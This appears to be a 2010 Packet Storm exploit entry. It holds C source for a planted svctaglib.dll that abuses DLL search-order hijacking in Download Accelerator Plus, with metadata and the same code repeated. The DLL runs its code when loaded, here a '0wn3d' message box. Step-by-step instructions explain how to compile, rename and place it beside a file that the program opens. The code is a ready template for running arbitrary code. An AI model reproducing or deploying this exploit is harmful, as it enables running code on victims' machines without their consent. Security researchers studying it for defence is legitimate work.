ID PACKETSTORM:94296 Type packetstorm Reporter anT!-Tr0J4n Modified 2010-09-28T00:00:00
Description
`/*
#Download Accelerator Plus DLL Hijacking Exploit (svctaglib.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software Link:http://www.speedbit.com/
#Tested on: Windows XP sp3
#####################
How TO use :
Compile and rename to svctaglib.dll , create a file in the same dir with one of the following extensions.
check the result > Hack3d
#####################
#svctaglib.dll (code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
`
{"id": "PACKETSTORM:94296", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Download Accelerator Plus DLL Hijacking", "description": "", "published": "2010-09-28T00:00:00", "modified": "2010-09-28T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/94296/Download-Accelerator-Plus-DLL-Hijacking.html", "reporter": "anT!-Tr0J4n", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:29", "viewCount": 2, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2016-11-03T10:26:29", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:29", "rev": 2}, "vulnersScore": 0.9}, "sourceHref": "https://packetstormsecurity.com/files/download/94296/dap-dllhijack.txt", "sourceData": "`/* \n#Download Accelerator Plus DLL Hijacking Exploit (svctaglib.dll) \n \n#Author : anT!-Tr0J4n \n \n#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends \n \n#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com \n \n#Software Link:http://www.speedbit.com/ \n \n#Tested on: Windows XP sp3 \n \n \n \n##################### \nHow TO use : \n \nCompile and rename to svctaglib.dll , create a file in the same dir with one of the following extensions. \ncheck the result > Hack3d \n##################### \n \n#svctaglib.dll (code) \n*/ \n \n#include \"stdafx.h\" \n \nvoid init() { \nMessageBox(NULL,\"Your System 0wn3d BY anT!-Tr0J4n\", \"anT!-Tr0J4n\",0x00000003); \n} \n \n \nBOOL APIENTRY DllMain( HANDLE hModule, \nDWORD ul_reason_for_call, \nLPVOID lpReserved \n) \n{ \nswitch (ul_reason_for_call) \n{ \ncase DLL_PROCESS_ATTACH: \ninit();break; \ncase DLL_THREAD_ATTACH: \ncase DLL_THREAD_DETACH: \ncase DLL_PROCESS_DETACH: \nbreak; \n} \nreturn TRUE; \n} \n \n`\n"}